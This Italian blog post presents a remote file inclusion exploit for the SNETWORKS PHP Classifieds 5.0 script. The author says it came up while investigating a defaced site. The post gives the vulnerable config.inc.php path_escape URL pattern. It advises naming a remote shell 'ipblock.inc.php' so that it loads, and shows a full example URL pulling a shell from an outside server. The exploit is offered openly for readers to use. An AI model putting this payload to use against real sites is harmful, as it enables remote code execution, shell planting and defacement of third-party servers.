Home » Sicurezza » [EXPLOIT] SNETWORKS PHP CLASSIFIEDS 5.0 – RFI

[EXPLOIT] SNETWORKS PHP CLASSIFIEDS 5.0 – RFI

Oggi facendo il mio lavoro sono incappato in un sito con installato lo script “SNETWORKS PHP CLASSIFIEDS” constatando che è vulnerabile a diversi tipi di hacking.

Avevo la necessità di testare alcune vulnerabilità per verificare se il sito che stavo analizzando era stato defacciato a causa di questo applicativo o se invece erano state utilizzate altre tecniche. Ne ho trovate diverse ma per ora vi scrivo la Remote File Inclusion utilizzata che, comunque, si trova facilmente cercando in Rete:

http://[Taget]/[Path]/config.inc.php?path_escape=<url che volete includere>?

Dalle mie verifiche ho riscontrato che il file che viene ricercato nell’Url specificato è “ipblock.inc.php” e, quindi, se volete includere una shell o simili vi consiglio di chiamare il file in tale modo e inserire l’Url dell Rfi senza specificare il file.

Se, quindi, avete il file nel sito “http://www.miosito.it/shell/ipblock.inc.php” l’Url per la Remote File Inclusion sarà:

http://[Taget]/[Path]/config.inc.php?path_escape=http://www.miosito.it/shell/

A questo link potete leggere la Vulnerabilità descritta dal sito FrSIRT.

Ti è stato utile? Votalo!
[Voti: 0    Media Voto: 0/5]
Altro... exploit, PHP CLASSIFIEDS, remote file inclusion, Rfi
Chiudi